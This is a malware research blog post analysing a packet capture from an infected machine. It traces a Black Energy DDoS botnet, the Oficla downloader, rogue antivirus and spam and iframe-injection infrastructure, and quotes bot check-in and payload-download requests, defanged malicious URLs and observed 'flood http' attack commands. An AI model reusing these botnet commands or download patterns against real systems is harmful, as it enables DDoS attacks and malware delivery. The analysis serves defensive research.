Russian Malware Bundle

by Nart Villeneuve

This Malware Lab blog post analyzes a packet capture file from an infected computer associated with a political figure. While evidence of compromise was found, the malware infection is most likely unrelated to political activities and was not a targeted attack. Rather, the infection is related to the criminal activities of attackers based in Russia or the Ukraine.

Key findings:

  • From the malware connections recorded in the packet capture file we were able to discover malware that bundled a Black Energy bot with the “Oficla/Sasfis” Trojan downloader as well as known rogue/fake anti-virus software.
  • We were able to access an interface to the Black Energy botnet that was not secured and observed the attackers conduct a brief DDoS attack.
  • Despite being a Russian botnet, many of the domain names were .cn and many IP addresses were Chinese.
  • This network is linked with an operation that spams nearly 4.3 million email addresses with gambling, pornography, pharmaceuticals, rogue AV software and other malware. It is also linked with an iframe injection campaign.


In 2008, Steven Adair, from Shadowserver, noted that the Black Energy botnet was moving beyond just DDoS attack to other areas of cybercrime.

Black Energy this year went from just DDOSing to spreading keyloggers to steal credentials and passwords, Adair says. Like other botnets, it has been updating itself with new malware.1

In fact this appears to be the case for a variety of botnets. Dancho Danchev states groups that used to specialize in DDoS attacks are “‘vertically integrating’ in order to occupy as many underground market segments as possible.”2

Another interesting observation by Danchev, that is supported by this investigation, is that DDoS vendors are attacking non-political sites in order to avoid drawing attention to themselves. Danchev explains:

It’s also worth pointing out that a huge number of “boutique vendors” of DDoS services remain reluctant to initiate DDoS attacks against government or political parties, in an attempt to stay beneath the radar. This mentality prompted the inevitable development of “aggregate-and-forget” type of botnets exclusively aggregated for customer-tailored propositions who would inevitably get detected, shut down, but end up harder to trace back to the original source compared to a situation where they would be DDoS the requested high-profile target from the very same botnet that is closely monitored by the security community.3

Instead, they focus on extortion schemes in which they charge for a protection racket (to not DDoS a web site) as well as encouraged “protected” sites to DDoS their competitors.

Now that various attacker groups have diversified it is difficult to distinguish their activities from one another. Different groups propagate eachother’s malware or use what FireEye calls a “BotnetWeb” which is defined as:

A collection of heterogeneous Botnets being operated in conjunction with each other controlled by one or more closely linked cyber criminal group(s).4

Some of this may be the result of splintering among more well established groups. The ThreatFire blog suggests that the Storm group has broken into several groups with some now teaming up with rogue AV’s.5 This realignment of criminal actors may partially explain the diversification of malware.

However, there also appears to be a significant role for “middlemen” who simply propagate content, whether it be advertisements, iframe injection, rogue AV’s, or botnet software.

Packet Capture

The packet capture from the infected computer shows a variety of malware activity. While the malware activity may be related there appears to be different types.

The infected computer connected to four control servers: ( – NEOWEB HOSTING, RU ( – China Netcom, CN ( – China Netcom, CN ( – China Netcom, CN

The captured network traffic shows a connection from the infected computer to ( and a file “ R23.exe” is downloaded.

GET /1/R23.exe HTTP/1.0

An automated analysis of “ R23.exe” by ThreatExpert shows that connections are issued to ( and ( as well as ( However, the captured network traffic from the infected computer does not show any connections to (, IntTranspNet, RU).

Black Energy

Black Energy is a botnet toolkit and its primary functionality is Distributed Denial of Service (DDoS) attacks. The bots communicate with command and control server using the HTTP protocol. It is used by Russian hackers and Black Energy botnet kits can be purchased for about $40. There are at least 30 distinct Black Energy botnets.7 According to Arbor Networks, Black Energy botnets were used in the DDoS attack on Georgia in 2008.8

The captured network traffic from the infected computer does show a connection to ( is a check-in:

POST /1/stat.php HTTP/1.0

HTTP/1.1 200 OK

The response from the C&C is base64 encoded, when decoded it is:


Further analysis of the Black Energy control server at ( revealed the command interface that the attacker uses to issue commands to infected computers. According to the statistics in the interface the attackers had 2044 active bots, an average of 2418 per hour and 8105 per day. In total the attackers recorded 64346 infections.


Further investigation revealed the command interface for another Black Energy control server on the same IP address, (, China Netcom) was also accessible. According to the statistics in the interface the attackers had 3623 active bots, an average of 4869 per hour and 12749 per day. In total the attackers recorded 51813 infections.


During the investigation the attackers began a DDoS attack against “” with the command:

flood http

The IP address is assigned to “Erix colocation and vps service” in Moscow, Russia and the only domain we found that resolved to this IP address is,, which appears to be a web site selling services to obtain Russian driver’s licenses. The command was changed back to “wait” shortly thereafter.


Several minutes later the following command was issued on both Black Energy control servers which had a total of 5387 active bots at the time.

flood http index.html

We also observed both command and control servers issues addition DDoS commands:

flood http
flood http forum
flood http
flood http

(The version of Black Energy running on these servers appears to be 1.7 as new files introduced with Black Energy 1.8 do not appear on these servers.9)


After the connection to, there was a connection to ( where the infected computer is directed to download “bot.exe” from (

GET /tmp/bb.php?id=912030164&v=200&tm=21&b=DDOS1 HTTP/1.1

HTTP/1.1 200 OK

An automated analysis of “bot.exe” shows that it connects to ( Follow-up requests to ( instructed the infected computer to “delay.”

GET /tmp/bb.php?id=912030164&v=200&tm=21&b=DDOS1&tid=43&r=1 HTTP/1.1

HTTP/1.1 200 OK

This behaviour is identical to Win32/Oficla, a trojan downloader.11 In this case the Oficla download instructs the infected computer to download “bot.exe” which connect to the Black Energy control server.

Rogue AV’s

The malware file “R23.exe,” which the original infected computer downloaded from (, connected to to (, the Black Energy control server, (, the Oficla/Sasfis control server, as well as a URL associated with rogue/fake antivirus software.12


In fact, there were additional malware files in the same directory as “R23.exe” on ( including “8.exe,”13 “R31.exe”14 and “Windows_Protector.exe.”15 An analysis of “ Windows_Protector.exe” showed that it downloaded another files named “PC_protect.exe” from (, NL-LEASEWEB, NL).16

This URL was found in hxxp:// “ Windows_Protector.exe.” The “x.exe”17 from (, DINETHOSTING, RU) file connects to ( and begins an SSL encrypted session.
The files that were on ( were replaced with “Bee.dll,”18 “ked.exe,”19 “win2ext.exe,”20 and “Windows_Protector.exe.”21 The “win2ext.exe” file connected to (, E-Icann, China Netcom, CN) and (, Group Vertical Ltd, RU).


There were some connections, which appeared to be unrelated to the malware analyzed above, requesting “/toolbarprofit/images/body_bg_bot.jpg” from the IP address “” (Network Operations Center Inc., US) with the host header “” These connections are redirected “” Software that connects to the IP address, “,” is under review by PrevX.22

GET /toolbarprofit/images/body_bg_bot.jpg HTTP/1.0

HTTP/1.1 301 Moved Permanently
Server: nginx

The domain “” resolves to “” and is an alias for “”

$ host is an alias for has address

Searches focused on “toolbarprofit” yielded an individual known as “rundll32” using the email address “” and the ICQ number “561194042.”


There is a post by “rundll32” that advertises an “affiliate” program that is “not detected by any antivirus.” In this post “rundll32” advertizes the ICQ number “551802661” and the website “” The same text has been posted on a variety of Russian hacker forums.23


While resolves to (NL-LEASEWEB, NL), exhibits the same behaviour as

$ host is an alias for has address

Our investigation then focused on the email address, “”, which was used to register A search for “” returns a paper written by Alexander V. Prokhorov (or Prochorov), a student at Moscow State University, Russia.


The same search also returned a server that is being used for spam as well as iframe injection. In fact, “” appears on a large spam list of 4,288,450 email addresses. There were a variety of templates as well as tools for sending spam located on the server across the following domains al of which are hosted on the same IP address (, HostRocket Web Services, US): and



In addition, we found a variety of redirects to various pornography sites as well as a pharmaceutical site,, and rogue AV sites. For example, the site, hxxp://, redirects to hxxp:// where the user is forced to download rogue AV software.24




We also found that some pages redirected users to “” which is hosted on the same IP address, (China Netcom, CN) as the Black Energy command and control servers and The connections to

GET /t/out.php HTTP/1.1

HTTP/1.x 302 Found

GET /sutra/in.cgi?default HTTP/1.1

HTTP/1.x 302 Found

GET /sutra/in.cgi?2 HTTP/1.1

HTTP/1.x 302 Found

We also found a variety of malicious javascript and iframes that loaded the following URLs:

hxxp:// (, NETPLACE, RU)
hxxp:// (, Telos Solutions, NL)
hxxp:// (, eNom, US)

The domain, has been hosting “Windows_Protector.exe” which is the rogue AV we also found on ( The domain, was found serving Zeus related binaries from a Chinese IP address.26 All these domain names appear to have been used in iframe injection attacks.

Additional searches reveal web sites that contained similar scripts and tools as those used on the domains listed above including, and


There was another connection of interest in our packet capture sample to “” (NETDIRECT-NET, DE) which is very similar to the connection between a Storm “supernode” and a “subcontroler” as described by SecureWorks’ Joe Stewart.29

POST /u/ HTTP/1.0
Content-Type: application/x-www-form-urlencoded
User-Agent: Internet Explorer
Content-Length: 712
Pragma: no-cache


HTTP/1.1 200 OK
Date: Tue, 13 Oct 2009 08:30:16 GMT
Server: Apache/2.2.11 (FreeBSD) PHP/5.2.9 with Suhosin-Patch
X-Powered-By: PHP/5.2.9
Content-Length: 28
Connection: close
Content-Type: text/html


According to Joe Stewart the “master” control server is often protected by another nginx server. However, the server on appears to be Apache.

It is unclear if this is related to the malware “bundle” described in this post.







6 and




10 and

11 and


13 and

14 and

15 and

16 The IP address changed.

17 and



20 and


22 and

23 ,




27 When connecting directly to the requested file, a 403 HTTP header is received, however, when connecting with “” as the host header the browser is redirected to

28 and and


About Malware Lab

The Malware Lab ( is an independent research collective comprised of volunteers that investigates and reports on politically motivated malware attacks, primarily against civil society organizations. The Malware Lab combines technical data with socio-political contextual analysis in order to better understand the capabilities and motivations of the attackers as well as the overall effects and broader implications of targeted attacks.

Post a comment.